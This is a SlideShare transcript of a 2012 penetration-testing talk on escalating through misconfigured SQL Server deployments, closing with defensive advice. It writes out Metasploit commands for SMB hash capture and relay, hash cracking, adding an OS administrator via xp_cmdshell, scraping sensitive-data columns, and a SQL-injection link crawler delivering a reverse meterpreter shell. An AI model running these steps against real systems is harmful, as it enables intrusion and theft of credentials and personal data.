SlideShare una empresa de Scribd logo

SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012

Scott Sutherland
Scott Sutherland

During this presentation attendees will be introduced to lesser known, yet significant vulnerabilities in SQL Server implementations related to common trust relationships, misconfigurations, and weak default settings. The issues that will be covered are often leveraged by attackers to gain unauthorized access to high value systems, applications, and sensitive data. An overview of each issue, common vectors of attack, and manual techniques will be covered. Finally newly created Metasploit modules and TSQL scripts will be demonstrated that help automate the attacks. This presentation will be valuable to penetration testers who are looking for faster ways to gain access to critical data and systems. Additionally, it should be worth while for developers and database administrators who are interested in gaining a better understanding of how to protect their applications and databases from these attacks. More security blogs by the authors can be found @ https://www.netspi.com/blog/

Tecnología
1 de 76
Descargar para leer sin conexión
SQL Server Exploitation, Escalation, and Pilfering AppSec USA 2012 Authors: Antti Rantasaari Scott Sutherland
Who are we? Antti Rantasaari Scott Sutherland (@_nullbind) What we do… • Security consultants at NetSPI • Pentesters ‒ Network ‒ Web ‒ Thick • Researchers, bloggers, etc • Pinball enthusiasts
What are we going to cover? 1. Database entry points 2. Domain user  Database user 3. Database user  OS admin 4. OS admin  Database admin 5. Database admin  OS admin 6. Finding sensitive data 7. Escalation: Service accounts 8. Escalation: Database Link Crawling 9. Conclusions
Why target SQL Servers? Pentest Goal = Data Access • It’s deployed everywhere • Very few “exploits”, but it’s commonly misconfigured • Integrated with Windows and Active Directory authentication • Easy and stable to exploit
Why develop Metasploit tools? • I suck at programming • Easy to use framework • Huge community support • Easy management of code (GitHub) • Easy distribution of code http://www.metasploit.com/ https://github.com/rapid7/metasploit-framework
Let’s get started!
Entry Points: Summary asef Unauthenticated Options • SQL injections • Weak passwords Authenticated Options (usually) • Other database servers • Unencrypted connection strings: ‒ Files ‒ Registry ‒ Network • ODBC connections • Client tools (priv inheritance)
DOMAIN user  DATABASE user Privilege Inheritance
Privilege Inheritance: Summary The “Domains Users” group is often provided privileges to login into SQL Servers… Evil users just need to: • Find SQL Servers • Verify Access • Attack!
Privilege Inheritance: Find SQL Servers Easy SQL Server Discovery = SQLPing v3.0 http://www.sqlsecurity.com/dotnetnuke/uploads/sqlping3.zip
Privilege Inheritance: Find SQL Servers Finding SQL Servers with osql:
Privilege Inheritance: Verify Access Test current user’s access to SQL Servers with osql: FOR /F “tokens=*” %i in (‘type sqlservers.txt’) do osql –E –S %i –Q “select ‘I have access to:’+@@servername”
Privilege Inheritance: Verify Access Test alternative user’s access to the SQL Servers with the MSSQL_SQL Metasploit module: msfconsole use auxiliary/admin/mssql/mssql_sql set RHOST <IP RANGE> set RPORT <port> set USE_WINDOWS_AUTHENT true set DOMAIN <domain> set USERNAME <user> set PASSWORD <password> Set SQL <query> run http://www.metasploit.com/modules/auxiliary/admin/mssql/mssql_sql
Privilege Inheritance: Verify Access asef
Privilege Inheritance: Verify Access asef
DATABASE USER  OS ADMIN SMB Capture/Relay
SMB Capture/Relay: Summary SQL Server supports functions that can access files via UNC paths using the privileges of the SQL Server service account. High level authentication process:
SMB Capture/Relay: Summary Stored procedures with UNC support: ‒ *xp_dirtree ‒ *xp_fileexist ‒ xp_getfiledetails Possible SMB authentication attacks: Service Account Network Communication SMB Capture SMB Relay LocalSystem Computer Account Yes No NetworkService Computer Account Yes No *Local Administrator Local Administrator Yes Yes *Domain User Domain User Yes Yes *Domain Admin Domain Admin Yes Yes http://erpscan.com/press-center/smbrelay-bible-2-smbrelay-by-ms-sql-server/ http://www.netspi.com/blog/2010/07/01/invisible-threats-insecure-service-accounts/
SMB Capture: Diagram
SMB Capture: Start Sniffing for Hashes Start Metasploit SMB capture module on your evil server to capture seeded password hashes: msfconsole use auxiliary/server/capture/smb set CAINPWFILE /root/cain_hashes.txt set JOHNPWFILE /root/john_hashes.txt exploit http://www.metasploit.com/modules/auxiliary/server/capture/smb http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html
SMB Capture: Force MS SQL to Auth Force SQL Server to authenticate with the modules: MSSQL_NTLM_STEALER or MSSQL_NTLM_STEALER_SQLI msfconsole use auxiliary/admin/mssql/mssql_ntlm_stealer set USE_WINDOWS_AUTHENT true set DOMAIN <domain> set USERNAME <user> set PASSWORD <password> set RHOSTS <IP RANGE> set RPORT <port> Set SMBPROXY <evil server> run
SMB Capture: Obtain Seeded Hashes Obtaining service account hashes from the SQL Server should look something like this: DOMAIN: DEMO USER: serviceaccount LMHASH:5e17a06b538a42ae82273227fd61a5952f85252cc731bb25 NTHASH:763aa16c6882cb1b99d40dfc337b69e7e424d6524a91c03e http://www.metasploit.com/modules/auxiliary/server/capture/smb http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html
SMB Capture: Crack Hashes 1. Crack first half of recovered LANMAN hash with seeded half LM Rainbow Tables: rcracki_mt -h 5e17a06b538a42ae ./halflmchall 2. Crack the second half with john the ripper to obtain case sensitive NTLM password. perl netntlm.pl --seed GPP4H1 --file /root/john_hashes.txt http://www.metasploit.com/modules/auxiliary/server/capture/smb http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html
SMB Relay: Diagram Very high level overview: http://en.wikipedia.org/wiki/SMBRelay
SMB Relay: Setup SMBProxy for Relay SMB Relay to 3rd Party with the SMB_Relay Metasploit exploit module: msfconsole use exploit/windows/smb/smb_relay set SMBHOST <targetserver> exploit If the service account has the local admin privileges on the remote system, then a shell will be returned by the smb_relay module http://www.metasploit.com/modules/exploit/windows/smb/smb_relay
SMB Relay: Force MS SQL to Auth Force SQL Server to authenticate with the modules MSSQL_NTLM_STEALER or MSSQL_NTLM_STEALER_SQLI Msfconsole use auxiliary/admin/mssql/mssql_ntlm_stealer set USE_WINDOWS_AUTHENT true set DOMAIN <domain> set USERNAME <user> set PASSWORD <password> set RHOSTS <IP RANGE> set RPORT <port> Set SMBPROXY <evil server> run
SMB Relay: Get Meterpreter Shells
SMB Capture/Relay: Using PW or Shell If meterpreter then: • Type: shell • Type: osql –E –Q “what ever you want” If password: • Sign in via RDP • Open a cmd console • osql –E –Q “what ever you want”
DEMO
Do a crazy dance! BALLET = NOT CRAZY DANCING FLY = TOTALLY CRAZY
OS ADMIN  DATABASE ADMIN SQL Server Local Authorization Bypass
Local Auth Bypass: Summary How can we go from OS admin to DB admin? • SQL Server 2000 to 2008 ‒ LocalSystem = Sysadmin privileges • SQL Server 2012 ‒ Must migrate to SQL Server service process for Sysadmin privileges
Local Auth Bypass: Summary Transparent Encryption = Mostly Useless (unless local hard drive encryption is in place and key management is done correctly)
Local Auth Bypass: Psexec On SQL Server 2000 to 2008 Execute queries as sysadmin with osql: psexec –s cmd.exe osql –E –S “localhostsqlexpress” –Q “select is_srvrolemember(‘sysadmin’)” Execute queries as sysadmin with SSMS: psexec –i –s ssms http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx
Local Auth Bypass: Get Shell Obtain Meterpreter shell using the PSEXEC module msfconsole use exploit/windows/smb/psexec set RHOST <targetserver> set SMBDOMAIN . set SMBUSER <user> set SMBPASS <password> exploit http://www.metasploit.com/modules/exploit/windows/smb/psexec
Local Auth Bypass: Get Sysadmin Create sysadmin in database using the Metasploit mssql_local_auth_bypass post module: In Meterpeter type “background” to return to msconsole. Then, in the msfconsole type: use post/windows/manage/mssql_local_auth_bypass set session <session> set DB_USERNAME <username> set DB_PASSWORD <password> exploit http://www.metasploit.com/modules/post/windows/manage/mssql_local_auth_bypass
SQL Server Auth Bypass: Got Sysadmin asef
Do a crazy whale dance! To the left… To the right… Now dive!
DATABASE ADMIN  OS ADMIN xp_cmdshell
XP_CMDSHELL: Summary XP_CMDSHELL = OS COMMAND EXEC Yes. We know you already know this, but don’t forget…
XP_CMDSHELL: Re-Install Re-install xp_cmdshell EXEC master..sp_addextendedproc "xp_cmdshell", "C:Program FilesMicrosoft SQL ServerMSSQLBinnxplog70.dll";
XP_CMDSHELL: Re-Enable Re-enable xp_cmdshell sp_configure ‘show advanced options’, 1; reconfigure; go; sp_configure ‘xp_cmdshell’, 1; reconfigure; go;
XP_CMDSHELL: Execute Commands Add Local OS Administrator with xp_cmdshell EXEC master..xp_cmdshell ‘net user myadmin MyP@sword1’ EXEC master..xp_cmdshell ‘net localgroup administrators /add myadmin’
FINDING DATA
Finding Data: Summary GOAL = Find sensitive data! • Credit cards • Social security number • Medical records
Finding Data: TSQL Script Simple keywords search via TSQL! EXEC master..sp_msforeachdb 'SELECT @@Servername as Server_Name,''[?]'' as Database_name,Table_Name,Column_Name FROM [?].INFORMATION_SCHEMA.COLUMNS WHERE Column_Name LIKE ''%password%'' OR Column_Name LIKE ''%Credit%'' OR Column_Name LIKE ''%CCN%'' OR Column_Name LIKE ''%Account%'' OR Column_Name LIKE ''%Social%'' OR Column_Name LIKE ''%SSN%'' ORDER BY Table_name'
Finding Data: Metasploit Module Database scraping with the mssql_findandsampledata module! Features • Scan multiple servers • Authenticate with local Windows, Domain or SQL credentials • Sample data • Number of records found • Output to screen and CSV file http://www.metasploit.com/modules/auxiliary/admin/mssql/mssql_findandsampledata
Finding Data: Metasploit Module Launching mssql_findandsampledata: msfconsole use auxiliary/admin/mssql/mssql_findandsampledata set RHOSTS <range> set RPORT <port> setg USE_WINDOWS_AUTHENT true setg DOMAIN <CompanyDomain> set USERNAME <username> set PASSWORD <password> set SAMPLE_SIZE <size> set KEYWORDS credit|social|password exploit
Finding Data: Module Output asef
Finding Data: Demo DEMO
Do a crazy cat disco dance!
Escalation: Service Accounts
Shared Service Accounts: Summary XP_CMDSHELL + Shared Service Accounts + OSQL -E = (more) Unauthorized DATA access
Shared Service Accounts: Diagram asef
Shared Service Accounts: TSQL Script XP_CMDSHELL + OSQL = MORE ACCESS! EXEC master..xp_cmdshell ‘osql –E –S HVA –Q “select super.secret.data”’ More examples: http://www.netspi.com/blog/2011/07/19/when-databases-attack-hacking- with-the-osql-utility/
Escalation: Database Link Crawling
Database Link Crawling: Summary Database Links • Allow one database server to query another • Often configured with excessive privileges • Can be chained together • Use openquery() to query linked servers • Can be used to execute the infamous xp_cmdshell • Tons of access, no credentials required (via SQL injection)
Database Link Crawling: Diagram asef
Database Link Crawling: List Links How do I list linked servers? Two common options: sp_linkedservers and SELECT srvname FROM master..sysservers
Database Link Crawling: List Links How do I list linked servers on a linked server? SELECT srvname FROM openquery(DB1, 'select srvname FROM master..sysservers')
Database Link Crawling: List Links How do I list linked servers on the linked server’s linked server? SELECT srvname FROM openquery(DB1,'SELECT srvname FROM openquery(HVA,''SELECT srvname FROM master..sysservers'')')
Database Link Crawling: You Get it! ….You get the point You can follow links until you run out 
Database Link Crawling: Exec Cmds How do I run commands on a linked server? SELECT * FROM openquery(DB1,’SELECT * FROM openquery(HVA,’’SELECT 1;exec xp_cmdshell ‘’’’ping 192.168.1.1’’’’ ‘’)’)
Database Link Crawling: Modules Two Modules 1. Direct connection 2. SQL Injection Available for Download • Not submitted to Metasploit trunk – Yet • Downloads available from nullbind’s github ‒ mssql_linkcrawler.rb ‒ mssql_linkcrawler_sqli.rb
Database Link Crawling: Modules • Features ‒ Crawl SQL Server database links ‒ Standard Crawl output ‒ Verbose Crawl output ‒ Output to CSV file ‒ Supports 32 and 64 bit Windows ‒ Global Metasploit payload deployment ‒ Targeted Metasploit payload deployment ‒ Payload deployment via powershell memory injection
Metasploit Module: Run multi/handler Setup the multi/handler module: use multi/handler set payload windows/meterpreter/reverse_tcp set lhost 0.0.0.0 set lport 443 set ExitOnSession false exploit -j -z
Metasploit Module: Link Crawler Setup the mssql_linkcrawler_sqli module: use exploit/windows/mssql/mssql_linkcrawler_sqli set GET_PATH /employee.asp?id=1;[SQLi];-- set type blind set RHOST 192.168.1.100 set payload windows/meterpreter/reverse_tcp set lhost 192.168.1.130 set lport 443 set DisablePayloadHandler true exploit
Database Link Crawling: Attack! asef
Database Link Chaining: Demo DEMO
Do a crazy cat disco dance! Yes. It warrants 2 disco cats!
Database Link Chaining: Modules Current Constraints • Cannot crawl through SQL Server 2000 • Cannot enable xp_cmdshell through links • Cannot deliver payloads to systems without powershell (at the moment) • Currently, the module leaves a powershell process running on exit • Currently, doesn’t allow arbitrary query execution on linked servers
Conclusions configure all accounts with LEAST PRIVILEGE system accounts service accounts database accounts application accounts
Conclusions always VALIDATE INPUT web apps thick apps mobile apps web services
Conclusions Configure SMB SIGNING
Conclusions don’t do DRUGS
Questions Antti Rantasaari Email: antti.rantasaari@netspi.com Scott Sutherland Email: scott.sutherland@netspi.com Blog: http://www.netspi.com/blog/author/ssutherland/ Github: http://www.github.com/nullbind/ Twitter: @_nullbind Presentation Slides http://www.slideshare.net/nullbind/sql-serverexploitationescalationandpilferingapp- secusa2012

Recomendados

IdP, SAML, OAuth
IdP, SAML, OAuthIdP, SAML, OAuth
IdP, SAML, OAuthDan Brinkmann
 
2017 Secure360 - Hacking SQL Server on Scale with PowerShell
2017 Secure360 - Hacking SQL Server on Scale with PowerShell2017 Secure360 - Hacking SQL Server on Scale with PowerShell
2017 Secure360 - Hacking SQL Server on Scale with PowerShellScott Sutherland
 
HCL AppScan 10 のご紹介
HCL AppScan 10 のご紹介HCL AppScan 10 のご紹介
HCL AppScan 10 のご紹介Software Info HCL Japan
 
Open source APM Scouter로 모니터링 잘 하기
Open source APM Scouter로 모니터링 잘 하기Open source APM Scouter로 모니터링 잘 하기
Open source APM Scouter로 모니터링 잘 하기GunHee Lee
 
CSRF Attack and Its Prevention technique in ASP.NET MVC
CSRF Attack and Its Prevention technique in ASP.NET MVCCSRF Attack and Its Prevention technique in ASP.NET MVC
CSRF Attack and Its Prevention technique in ASP.NET MVCSuvash Shah
 
Elixirと他言語の比較的紹介 ver.2
Elixirと他言語の比較的紹介 ver.2Elixirと他言語の比較的紹介 ver.2
Elixirと他言語の比較的紹介 ver.2Tsunenori Oohara
 
Fortify-Application_Security_Foundation_Training.pptx
Fortify-Application_Security_Foundation_Training.pptxFortify-Application_Security_Foundation_Training.pptx
Fortify-Application_Security_Foundation_Training.pptxVictoriaChavesta
 
全文検索でRedmineをさらに活用!
全文検索でRedmineをさらに活用!全文検索でRedmineをさらに活用!
全文検索でRedmineをさらに活用!Kouhei Sutou
 

Recomendados

IdP, SAML, OAuth
IdP, SAML, OAuthIdP, SAML, OAuth
IdP, SAML, OAuthDan Brinkmann
 
2017 Secure360 - Hacking SQL Server on Scale with PowerShell
2017 Secure360 - Hacking SQL Server on Scale with PowerShell2017 Secure360 - Hacking SQL Server on Scale with PowerShell
2017 Secure360 - Hacking SQL Server on Scale with PowerShellScott Sutherland
 
HCL AppScan 10 のご紹介
HCL AppScan 10 のご紹介HCL AppScan 10 のご紹介
HCL AppScan 10 のご紹介Software Info HCL Japan
 
Open source APM Scouter로 모니터링 잘 하기
Open source APM Scouter로 모니터링 잘 하기Open source APM Scouter로 모니터링 잘 하기
Open source APM Scouter로 모니터링 잘 하기GunHee Lee
 
CSRF Attack and Its Prevention technique in ASP.NET MVC
CSRF Attack and Its Prevention technique in ASP.NET MVCCSRF Attack and Its Prevention technique in ASP.NET MVC
CSRF Attack and Its Prevention technique in ASP.NET MVCSuvash Shah
 
Elixirと他言語の比較的紹介 ver.2
Elixirと他言語の比較的紹介 ver.2Elixirと他言語の比較的紹介 ver.2
Elixirと他言語の比較的紹介 ver.2Tsunenori Oohara
 
Fortify-Application_Security_Foundation_Training.pptx
Fortify-Application_Security_Foundation_Training.pptxFortify-Application_Security_Foundation_Training.pptx
Fortify-Application_Security_Foundation_Training.pptxVictoriaChavesta
 
全文検索でRedmineをさらに活用!
全文検索でRedmineをさらに活用!全文検索でRedmineをさらに活用!
全文検索でRedmineをさらに活用!Kouhei Sutou
 
Api testing
Api testingApi testing
Api testingKeshav Kashyap
 
[Spring Camp 2018] 11번가 Spring Cloud 기반 MSA로의 전환 : 지난 1년간의 이야기
[Spring Camp 2018] 11번가 Spring Cloud 기반 MSA로의 전환 : 지난 1년간의 이야기[Spring Camp 2018] 11번가 Spring Cloud 기반 MSA로의 전환 : 지난 1년간의 이야기
[Spring Camp 2018] 11번가 Spring Cloud 기반 MSA로의 전환 : 지난 1년간의 이야기YongSung Yoon
 
ElasticSearch勉強会 第6回
ElasticSearch勉強会 第6回ElasticSearch勉強会 第6回
ElasticSearch勉強会 第6回Naoyuki Yamada
 
SSMSでSQL Serverの実行計画を見てSQLチューニング
SSMSでSQL Serverの実行計画を見てSQLチューニングSSMSでSQL Serverの実行計画を見てSQLチューニング
SSMSでSQL Serverの実行計画を見てSQLチューニング釣りキチ翔平
 
OAuth2 and Spring Security
OAuth2 and Spring SecurityOAuth2 and Spring Security
OAuth2 and Spring SecurityOrest Ivasiv
 
Azure ad の導入を検討している方へ ~ active directory の構成パターンと正しい認証方式の選択~
Azure ad の導入を検討している方へ ~ active directory の構成パターンと正しい認証方式の選択~Azure ad の導入を検討している方へ ~ active directory の構成パターンと正しい認証方式の選択~
Azure ad の導入を検討している方へ ~ active directory の構成パターンと正しい認証方式の選択~junichi anno
 
OAuth 2.0の概要とセキュリティ
OAuth 2.0の概要とセキュリティOAuth 2.0の概要とセキュリティ
OAuth 2.0の概要とセキュリティHiroshi Hayakawa
 
Powershell勉強会 v5 (こちらが最新です。)
Powershell勉強会 v5 (こちらが最新です。)Powershell勉強会 v5 (こちらが最新です。)
Powershell勉強会 v5 (こちらが最新です。)Tetsu Yama
 
ECS+Locust로 부하 테스트 진행하기
ECS+Locust로 부하 테스트 진행하기ECS+Locust로 부하 테스트 진행하기
ECS+Locust로 부하 테스트 진행하기Yungon Park
 
脆弱性ハンドリングと耐える設計 -Vulnerability Response-
脆弱性ハンドリングと耐える設計 -Vulnerability Response-脆弱性ハンドリングと耐える設計 -Vulnerability Response-
脆弱性ハンドリングと耐える設計 -Vulnerability Response-Tomohiro Nakashima
 
GoodBye AD FS - Azure Active Directory Only の認証方式へ切り替えよう!
GoodBye AD FS - Azure Active Directory Only の認証方式へ切り替えよう!GoodBye AD FS - Azure Active Directory Only の認証方式へ切り替えよう!
GoodBye AD FS - Azure Active Directory Only の認証方式へ切り替えよう!Yusuke Kodama
 
今更聞けないOAuth2.0
今更聞けないOAuth2.0今更聞けないOAuth2.0
今更聞けないOAuth2.0Takahiro Sato
 
ヤマハでISDN移行をスムーズに! - よくわかる概要と移行ケース
ヤマハでISDN移行をスムーズに! - よくわかる概要と移行ケースヤマハでISDN移行をスムーズに! - よくわかる概要と移行ケース
ヤマハでISDN移行をスムーズに! - よくわかる概要と移行ケースKei Mikage
 
Index tuning
Index tuningIndex tuning
Index tuningMicrosoft
 
SQL Injections (Part 1)
SQL Injections (Part 1)SQL Injections (Part 1)
SQL Injections (Part 1)n|u - The Open Security Community
 
Azure ADと外部アプリのID連携/SSO - Deep Dive
Azure ADと外部アプリのID連携/SSO - Deep DiveAzure ADと外部アプリのID連携/SSO - Deep Dive
Azure ADと外部アプリのID連携/SSO - Deep DiveNaohiro Fujie
 
SPAのルーティングの話
SPAのルーティングの話SPAのルーティングの話
SPAのルーティングの話ushiboy
 
마이크로서비스 기반 클라우드 아키텍처 구성 모범 사례 - 윤석찬 (AWS 테크에반젤리스트)
마이크로서비스 기반 클라우드 아키텍처 구성 모범 사례 - 윤석찬 (AWS 테크에반젤리스트) 마이크로서비스 기반 클라우드 아키텍처 구성 모범 사례 - 윤석찬 (AWS 테크에반젤리스트)
마이크로서비스 기반 클라우드 아키텍처 구성 모범 사례 - 윤석찬 (AWS 테크에반젤리스트) Amazon Web Services Korea
 
(DVO312) Sony: Building At-Scale Services with AWS Elastic Beanstalk
(DVO312) Sony: Building At-Scale Services with AWS Elastic Beanstalk(DVO312) Sony: Building At-Scale Services with AWS Elastic Beanstalk
(DVO312) Sony: Building At-Scale Services with AWS Elastic BeanstalkAmazon Web Services
 
シングルサインオンの歴史とSAMLへの道のり
シングルサインオンの歴史とSAMLへの道のりシングルサインオンの歴史とSAMLへの道のり
シングルサインオンの歴史とSAMLへの道のりShinichi Tomita
 
DerbyCon2016 - Hacking SQL Server on Scale with PowerShell
DerbyCon2016 - Hacking SQL Server on Scale with PowerShellDerbyCon2016 - Hacking SQL Server on Scale with PowerShell
DerbyCon2016 - Hacking SQL Server on Scale with PowerShellScott Sutherland
 
WTF is Penetration Testing
WTF is Penetration TestingWTF is Penetration Testing
WTF is Penetration TestingScott Sutherland
 

Más contenido relacionado

La actualidad más candente

[Spring Camp 2018] 11번가 Spring Cloud 기반 MSA로의 전환 : 지난 1년간의 이야기
[Spring Camp 2018] 11번가 Spring Cloud 기반 MSA로의 전환 : 지난 1년간의 이야기[Spring Camp 2018] 11번가 Spring Cloud 기반 MSA로의 전환 : 지난 1년간의 이야기
[Spring Camp 2018] 11번가 Spring Cloud 기반 MSA로의 전환 : 지난 1년간의 이야기YongSung Yoon
 
ElasticSearch勉強会 第6回
ElasticSearch勉強会 第6回ElasticSearch勉強会 第6回
ElasticSearch勉強会 第6回Naoyuki Yamada
 
SSMSでSQL Serverの実行計画を見てSQLチューニング
SSMSでSQL Serverの実行計画を見てSQLチューニングSSMSでSQL Serverの実行計画を見てSQLチューニング
SSMSでSQL Serverの実行計画を見てSQLチューニング釣りキチ翔平
 
OAuth2 and Spring Security
OAuth2 and Spring SecurityOAuth2 and Spring Security
OAuth2 and Spring SecurityOrest Ivasiv
 
Azure ad の導入を検討している方へ ~ active directory の構成パターンと正しい認証方式の選択~
Azure ad の導入を検討している方へ ~ active directory の構成パターンと正しい認証方式の選択~Azure ad の導入を検討している方へ ~ active directory の構成パターンと正しい認証方式の選択~
Azure ad の導入を検討している方へ ~ active directory の構成パターンと正しい認証方式の選択~junichi anno
 
OAuth 2.0の概要とセキュリティ
OAuth 2.0の概要とセキュリティOAuth 2.0の概要とセキュリティ
OAuth 2.0の概要とセキュリティHiroshi Hayakawa
 
Powershell勉強会 v5 (こちらが最新です。)
Powershell勉強会 v5 (こちらが最新です。)Powershell勉強会 v5 (こちらが最新です。)
Powershell勉強会 v5 (こちらが最新です。)Tetsu Yama
 
ECS+Locust로 부하 테스트 진행하기
ECS+Locust로 부하 테스트 진행하기ECS+Locust로 부하 테스트 진행하기
ECS+Locust로 부하 테스트 진행하기Yungon Park
 
脆弱性ハンドリングと耐える設計 -Vulnerability Response-
脆弱性ハンドリングと耐える設計 -Vulnerability Response-脆弱性ハンドリングと耐える設計 -Vulnerability Response-
脆弱性ハンドリングと耐える設計 -Vulnerability Response-Tomohiro Nakashima
 
GoodBye AD FS - Azure Active Directory Only の認証方式へ切り替えよう!
GoodBye AD FS - Azure Active Directory Only の認証方式へ切り替えよう!GoodBye AD FS - Azure Active Directory Only の認証方式へ切り替えよう!
GoodBye AD FS - Azure Active Directory Only の認証方式へ切り替えよう!Yusuke Kodama
 
今更聞けないOAuth2.0
今更聞けないOAuth2.0今更聞けないOAuth2.0
今更聞けないOAuth2.0Takahiro Sato
 
ヤマハでISDN移行をスムーズに! - よくわかる概要と移行ケース
ヤマハでISDN移行をスムーズに! - よくわかる概要と移行ケースヤマハでISDN移行をスムーズに! - よくわかる概要と移行ケース
ヤマハでISDN移行をスムーズに! - よくわかる概要と移行ケースKei Mikage
 
Index tuning
Index tuningIndex tuning
Index tuningMicrosoft
 
Azure ADと外部アプリのID連携/SSO - Deep Dive
Azure ADと外部アプリのID連携/SSO - Deep DiveAzure ADと外部アプリのID連携/SSO - Deep Dive
Azure ADと外部アプリのID連携/SSO - Deep DiveNaohiro Fujie
 
SPAのルーティングの話
SPAのルーティングの話SPAのルーティングの話
SPAのルーティングの話ushiboy
 
마이크로서비스 기반 클라우드 아키텍처 구성 모범 사례 - 윤석찬 (AWS 테크에반젤리스트)
마이크로서비스 기반 클라우드 아키텍처 구성 모범 사례 - 윤석찬 (AWS 테크에반젤리스트) 마이크로서비스 기반 클라우드 아키텍처 구성 모범 사례 - 윤석찬 (AWS 테크에반젤리스트)
마이크로서비스 기반 클라우드 아키텍처 구성 모범 사례 - 윤석찬 (AWS 테크에반젤리스트) Amazon Web Services Korea
 
(DVO312) Sony: Building At-Scale Services with AWS Elastic Beanstalk
(DVO312) Sony: Building At-Scale Services with AWS Elastic Beanstalk(DVO312) Sony: Building At-Scale Services with AWS Elastic Beanstalk
(DVO312) Sony: Building At-Scale Services with AWS Elastic BeanstalkAmazon Web Services
 
シングルサインオンの歴史とSAMLへの道のり
シングルサインオンの歴史とSAMLへの道のりシングルサインオンの歴史とSAMLへの道のり
シングルサインオンの歴史とSAMLへの道のりShinichi Tomita
 

La actualidad más candente (20)

Api testing
Api testingApi testing
Api testing
 
[Spring Camp 2018] 11번가 Spring Cloud 기반 MSA로의 전환 : 지난 1년간의 이야기
[Spring Camp 2018] 11번가 Spring Cloud 기반 MSA로의 전환 : 지난 1년간의 이야기[Spring Camp 2018] 11번가 Spring Cloud 기반 MSA로의 전환 : 지난 1년간의 이야기
[Spring Camp 2018] 11번가 Spring Cloud 기반 MSA로의 전환 : 지난 1년간의 이야기
 
ElasticSearch勉強会 第6回
ElasticSearch勉強会 第6回ElasticSearch勉強会 第6回
ElasticSearch勉強会 第6回
 
SSMSでSQL Serverの実行計画を見てSQLチューニング
SSMSでSQL Serverの実行計画を見てSQLチューニングSSMSでSQL Serverの実行計画を見てSQLチューニング
SSMSでSQL Serverの実行計画を見てSQLチューニング
 
OAuth2 and Spring Security
OAuth2 and Spring SecurityOAuth2 and Spring Security
OAuth2 and Spring Security
 
Azure ad の導入を検討している方へ ~ active directory の構成パターンと正しい認証方式の選択~
Azure ad の導入を検討している方へ ~ active directory の構成パターンと正しい認証方式の選択~Azure ad の導入を検討している方へ ~ active directory の構成パターンと正しい認証方式の選択~
Azure ad の導入を検討している方へ ~ active directory の構成パターンと正しい認証方式の選択~
 
OAuth 2.0の概要とセキュリティ
OAuth 2.0の概要とセキュリティOAuth 2.0の概要とセキュリティ
OAuth 2.0の概要とセキュリティ
 
Powershell勉強会 v5 (こちらが最新です。)
Powershell勉強会 v5 (こちらが最新です。)Powershell勉強会 v5 (こちらが最新です。)
Powershell勉強会 v5 (こちらが最新です。)
 
ECS+Locust로 부하 테스트 진행하기
ECS+Locust로 부하 테스트 진행하기ECS+Locust로 부하 테스트 진행하기
ECS+Locust로 부하 테스트 진행하기
 
脆弱性ハンドリングと耐える設計 -Vulnerability Response-
脆弱性ハンドリングと耐える設計 -Vulnerability Response-脆弱性ハンドリングと耐える設計 -Vulnerability Response-
脆弱性ハンドリングと耐える設計 -Vulnerability Response-
 
GoodBye AD FS - Azure Active Directory Only の認証方式へ切り替えよう!
GoodBye AD FS - Azure Active Directory Only の認証方式へ切り替えよう!GoodBye AD FS - Azure Active Directory Only の認証方式へ切り替えよう!
GoodBye AD FS - Azure Active Directory Only の認証方式へ切り替えよう!
 
今更聞けないOAuth2.0
今更聞けないOAuth2.0今更聞けないOAuth2.0
今更聞けないOAuth2.0
 
ヤマハでISDN移行をスムーズに! - よくわかる概要と移行ケース
ヤマハでISDN移行をスムーズに! - よくわかる概要と移行ケースヤマハでISDN移行をスムーズに! - よくわかる概要と移行ケース
ヤマハでISDN移行をスムーズに! - よくわかる概要と移行ケース
 
Index tuning
Index tuningIndex tuning
Index tuning
 
SQL Injections (Part 1)
SQL Injections (Part 1)SQL Injections (Part 1)
SQL Injections (Part 1)
 
Azure ADと外部アプリのID連携/SSO - Deep Dive
Azure ADと外部アプリのID連携/SSO - Deep DiveAzure ADと外部アプリのID連携/SSO - Deep Dive
Azure ADと外部アプリのID連携/SSO - Deep Dive
 
SPAのルーティングの話
SPAのルーティングの話SPAのルーティングの話
SPAのルーティングの話
 
마이크로서비스 기반 클라우드 아키텍처 구성 모범 사례 - 윤석찬 (AWS 테크에반젤리스트)
마이크로서비스 기반 클라우드 아키텍처 구성 모범 사례 - 윤석찬 (AWS 테크에반젤리스트) 마이크로서비스 기반 클라우드 아키텍처 구성 모범 사례 - 윤석찬 (AWS 테크에반젤리스트)
마이크로서비스 기반 클라우드 아키텍처 구성 모범 사례 - 윤석찬 (AWS 테크에반젤리스트)
 
(DVO312) Sony: Building At-Scale Services with AWS Elastic Beanstalk
(DVO312) Sony: Building At-Scale Services with AWS Elastic Beanstalk(DVO312) Sony: Building At-Scale Services with AWS Elastic Beanstalk
(DVO312) Sony: Building At-Scale Services with AWS Elastic Beanstalk
 
シングルサインオンの歴史とSAMLへの道のり
シングルサインオンの歴史とSAMLへの道のりシングルサインオンの歴史とSAMLへの道のり
シングルサインオンの歴史とSAMLへの道のり
 

Destacado

DerbyCon2016 - Hacking SQL Server on Scale with PowerShell
DerbyCon2016 - Hacking SQL Server on Scale with PowerShellDerbyCon2016 - Hacking SQL Server on Scale with PowerShell
DerbyCon2016 - Hacking SQL Server on Scale with PowerShellScott Sutherland
 
WTF is Penetration Testing
WTF is Penetration TestingWTF is Penetration Testing
WTF is Penetration TestingScott Sutherland
 
Secure360 - Extracting Password from Windows
Secure360 - Extracting Password from WindowsSecure360 - Extracting Password from Windows
Secure360 - Extracting Password from WindowsScott Sutherland
 
2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)
2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)
2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)Scott Sutherland
 
SQL Server Security - Attack
SQL Server Security - Attack SQL Server Security - Attack
SQL Server Security - Attack webhostingguy
 
2017 Q1 Arcticcon - Meet Up - Adventures in Adversarial Emulation
2017 Q1 Arcticcon - Meet Up - Adventures in Adversarial Emulation2017 Q1 Arcticcon - Meet Up - Adventures in Adversarial Emulation
2017 Q1 Arcticcon - Meet Up - Adventures in Adversarial EmulationScott Sutherland
 

Destacado (6)

DerbyCon2016 - Hacking SQL Server on Scale with PowerShell
